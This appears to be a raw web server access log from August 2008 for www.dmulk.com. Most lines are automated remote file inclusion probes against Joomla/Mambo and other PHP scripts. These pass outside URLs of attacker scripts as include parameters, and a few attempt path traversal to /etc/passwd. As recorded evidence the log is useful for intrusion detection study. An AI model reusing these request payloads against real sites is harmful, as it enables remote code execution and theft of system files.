69.19.225.130 - - [21/Aug/2008:11:20:27 -0700] "GET /logs/access_080127.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:20:28 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 200 9942 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:20:30 -0700] "GET /logs/access_080209.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:20:30 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:20:30 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.46.13.32 - - [21/Aug/2008:11:20:31 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://kosherkash.net/public/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.46.13.32 - - [21/Aug/2008:11:20:42 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://kosherkash.net/public/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:20:44 -0700] "GET /logs/access_080419.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:20:45 -0700] "GET /logs/access_080405.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:20:45 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 200 9943 "-" "libwww-perl/5.808" "www.dmulk.com"
89.208.43.121 - - [21/Aug/2008:11:20:45 -0700] "GET //purchase.php?jamroom[jm_dir]=http://katsioulis.com/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:20:45 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.208.43.121 - - [21/Aug/2008:11:20:45 -0700] "GET /logs//purchase.php?jamroom[jm_dir]=http://katsioulis.com/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [21/Aug/2008:11:20:48 -0700] "GET /logs/access_080808.log//purchase.php?jamroom[jm_dir]=http://katsioulis.com/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:20:50 -0700] "GET /logs/access_080404.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
190.30.164.230 - - [21/Aug/2008:11:20:50 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.freewebs.com/lostmind7/idv6.txt??? HTTP/1.1" 200 9889 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [21/Aug/2008:11:20:59 -0700] "GET /logs/access_080703.log//purchase.php?jamroom[jm_dir]=http://katsioulis.com/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:21:07 -0700] "GET /logs/access_080722.log/errors.php?error=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:21:08 -0700] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:21:11 -0700] "GET /logs/access_080510.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.52.166.106 - - [21/Aug/2008:11:21:11 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.taranakivista.co.nz/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:21:11 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 200 9950 "-" "libwww-perl/5.808" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:21:14 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
59.126.46.141 - - [21/Aug/2008:11:21:18 -0700] "GET /logs/access_080308.log/lostpasswd.php?env[include_prefix]=http://www.tes2008.kit.net/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.90.73.113 - - [21/Aug/2008:11:21:18 -0700] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=%20http://h1.ripway.com/rombongan/pid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.90.73.113 - - [21/Aug/2008:11:21:18 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=%20http://h1.ripway.com/rombongan/pid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
64.46.13.32 - - [21/Aug/2008:11:21:19 -0700] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://kosherkash.net/public/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.79.66.105 - - [21/Aug/2008:11:21:25 -0700] "GET /logs/access_080812.log/layout/default/params.php?gConf[dir][layouts]=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:21:33 -0700] "GET /logs/access_080507.log/phphtml.php?htmlclass_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:21:36 -0700] "GET /logs/access_080722.log//index.php?DOCUMENT_ROOT=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:21:40 -0700] "GET /logs/access_080510.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:21:41 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 200 9944 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
200.93.147.155 - - [21/Aug/2008:11:21:51 -0700] "GET /logs/access_080808.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.geocities.com/sak4w/rfi/aa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.93.147.155 - - [21/Aug/2008:11:21:54 -0700] "GET /logs/access_080209.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.geocities.com/sak4w/rfi/aa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [21/Aug/2008:11:22:00 -0700] "GET /logs/access_080717.log//errors.php?error=http://katsioulis.com/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [21/Aug/2008:11:22:00 -0700] "GET //errors.php?error=http://katsioulis.com/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [21/Aug/2008:11:22:00 -0700] "GET /logs//errors.php?error=http://katsioulis.com/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [21/Aug/2008:11:22:18 -0700] "GET /logs/access_080515.log//errors.php?error=http://katsioulis.com/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:22:19 -0700] "GET /logs/access_080405.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.77.242 - - [21/Aug/2008:11:22:27 -0700] "GET /logs/scripts.log//index.php3?act=http://wtv.mathiaskarge.de//marthabotid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:22:28 -0700] "GET /logs/access_080404.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
213.248.62.98 - - [21/Aug/2008:11:22:28 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.devilhouse.org/temp/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.106.77.242 - - [21/Aug/2008:11:22:28 -0700] "GET //index.php3?act=http://wtv.mathiaskarge.de//marthabotid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.77.242 - - [21/Aug/2008:11:22:28 -0700] "GET /logs//index.php3?act=http://wtv.mathiaskarge.de//marthabotid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.248.62.98 - - [21/Aug/2008:11:22:29 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.devilhouse.org/temp/alb2?? HTTP/1.1" 200 9968 "-" "libwww-perl/5.65" "www.dmulk.com"
87.106.77.242 - - [21/Aug/2008:11:22:30 -0700] "GET /logs/scripts.log//index.php3?act=http://wtv.mathiaskarge.de//marthabotid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.77.242 - - [21/Aug/2008:11:22:30 -0700] "GET //index.php3?act=http://wtv.mathiaskarge.de//marthabotid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.77.242 - - [21/Aug/2008:11:22:31 -0700] "GET /logs//index.php3?act=http://wtv.mathiaskarge.de//marthabotid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:22:39 -0700] "GET /logs/access_080510.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:22:40 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 200 9941 "-" "libwww-perl/5.808" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:22:40 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.77.242 - - [21/Aug/2008:11:22:41 -0700] "GET /logs/access_080703.log//index.php3?act=http://wtv.mathiaskarge.de//marthabotid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.77.242 - - [21/Aug/2008:11:22:44 -0700] "GET /logs/access_080703.log//index.php3?act=http://wtv.mathiaskarge.de//marthabotid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:22:48 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 200 9950 "-" "libwww-perl/5.808" "www.dmulk.com"
190.83.18.253 - - [21/Aug/2008:11:22:50 -0700] "GET /logs/access_080723.log//index.php?DOCUMENT_ROOT=http://www.confesercentilucca.it/rose/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.83.18.253 - - [21/Aug/2008:11:22:57 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.confesercentilucca.it/rose/idar.txt?? HTTP/1.1" 200 9890 "-" "libwww-perl/5.805" "www.dmulk.com"
119.63.193.186 - - [21/Aug/2008:11:23:00 -0700] "HEAD /retreat1/webcam/retreat1_00749.jpg HTTP/1.1" 200 0 "-" "BaiduImagespider+(+http://help.baidu.jp/system/05.html)" "www.dmulk.com"
119.63.193.186 - - [21/Aug/2008:11:23:00 -0700] "GET /retreat1/webcam/retreat1_00749.jpg HTTP/1.1" 200 56148 "-" "BaiduImagespider+(+http://help.baidu.jp/system/05.html)" "www.dmulk.com"
190.83.18.253 - - [21/Aug/2008:11:23:08 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.confesercentilucca.it/rose/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.182.98 - - [21/Aug/2008:11:23:13 -0700] "GET //index/login.php?DOCUMENT_ROOT=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
70.84.182.98 - - [21/Aug/2008:11:23:13 -0700] "GET /logs//index/login.php?DOCUMENT_ROOT=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
216.235.247.169 - - [21/Aug/2008:11:23:18 -0700] "GET /logs/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.21stcenturywoman.com/pics/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.235.247.169 - - [21/Aug/2008:11:23:18 -0700] "GET /components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.21stcenturywoman.com/pics/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.186 - - [21/Aug/2008:11:23:23 -0700] "GET /logs/access_080515.log HTTP/1.0" 200 786432 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
89.111.176.64 - - [21/Aug/2008:11:23:46 -0700] "GET /logs/access_080124.log/index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.137.82 - - [21/Aug/2008:11:23:46 -0700] "GET /logs/access_080812.log%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.kx-td.com/images/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.111.176.64 - - [21/Aug/2008:11:23:47 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.topyn.com/ips.txt? HTTP/1.1" 200 9909 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.64 - - [21/Aug/2008:11:23:48 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.37.185 - - [21/Aug/2008:11:23:49 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.90.73.113 - - [21/Aug/2008:11:23:49 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=%20http://h1.ripway.com/rombongan/pid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
203.211.131.132 - - [21/Aug/2008:11:23:49 -0700] "GET /logs/layout/default/params.php?gConf[dir][layouts]=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.211.131.132 - - [21/Aug/2008:11:23:49 -0700] "GET /layout/default/params.php?gConf[dir][layouts]=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.55.109.34 - - [21/Aug/2008:11:24:00 -0700] "GET /logs/access_080718.log/include/lib.inc.php?site_path=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:24:01 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:24:05 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
67.195.37.185 - - [21/Aug/2008:11:24:05 -0700] "GET / HTTP/1.0" 200 9797 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "www.dmulk.com"
74.55.109.34 - - [21/Aug/2008:11:24:10 -0700] "GET /logs/access_080718.log/include/lib.inc.php?site_path=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [21/Aug/2008:11:24:13 -0700] "GET /logs/access_080118.log//errors.php?error=http://katsioulis.com/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.15.10.22 - - [21/Aug/2008:11:24:16 -0700] "GET //index/login.php?DOCUMENT_ROOT=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.10.22 - - [21/Aug/2008:11:24:16 -0700] "GET /logs/access_080806.log//index/login.php?DOCUMENT_ROOT=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.10.22 - - [21/Aug/2008:11:24:16 -0700] "GET /logs//index/login.php?DOCUMENT_ROOT=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.46.13.32 - - [21/Aug/2008:11:24:24 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/jaemid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.46.13.32 - - [21/Aug/2008:11:24:24 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/jaemid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:24:28 -0700] "GET /logs/access_080228.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:24:29 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 200 9937 "-" "libwww-perl/5.808" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:24:32 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:24:34 -0700] "GET /logs/access_080503.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:24:36 -0700] "GET /logs/access_080419.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.208.43.121 - - [21/Aug/2008:11:24:37 -0700] "GET /logs/access_080124.log//errors.php?error=http://katsioulis.com/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:24:37 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 200 9943 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
92.48.98.6 - - [21/Aug/2008:11:24:41 -0700] "GET /logs/access_080718.log/include/lib.inc.php?site_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:24:51 -0700] "GET /logs/access_080311.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:24:53 -0700] "GET /logs/access_080510.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:24:54 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 200 9944 "-" "libwww-perl/5.808" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:24:55 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 200 9937 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:24:57 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:24:59 -0700] "GET /logs/access_080501.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:25:10 -0700] "GET /logs/access_080510.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:25:11 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 200 9950 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
78.129.138.76 - - [21/Aug/2008:11:25:17 -0700] "GET /logs/access_080713.log//admin/frontpage_right.php?loadadminpage=http://gabifir.yourfreehosting.net/z6id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:25:18 -0700] "GET /logs/access_080329.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
74.6.22.186 - - [21/Aug/2008:11:25:19 -0700] "GET /logs/access_071117.log HTTP/1.0" 200 175839 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:25:24 -0700] "GET /logs/access_080414.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.211.131.132 - - [21/Aug/2008:11:25:25 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.211.131.132 - - [21/Aug/2008:11:25:25 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:25:26 -0700] "GET /logs/access_080510.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:25:30 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 200 9941 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
208.115.34.17 - - [21/Aug/2008:11:25:50 -0700] "GET /logs/access_080806.log/lostpasswd.php?env[include_prefix]=http://www.myboso.com/alat/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
208.115.34.17 - - [21/Aug/2008:11:25:50 -0700] "GET /lostpasswd.php?env[include_prefix]=http://www.myboso.com/alat/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
208.115.34.17 - - [21/Aug/2008:11:25:50 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.myboso.com/alat/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
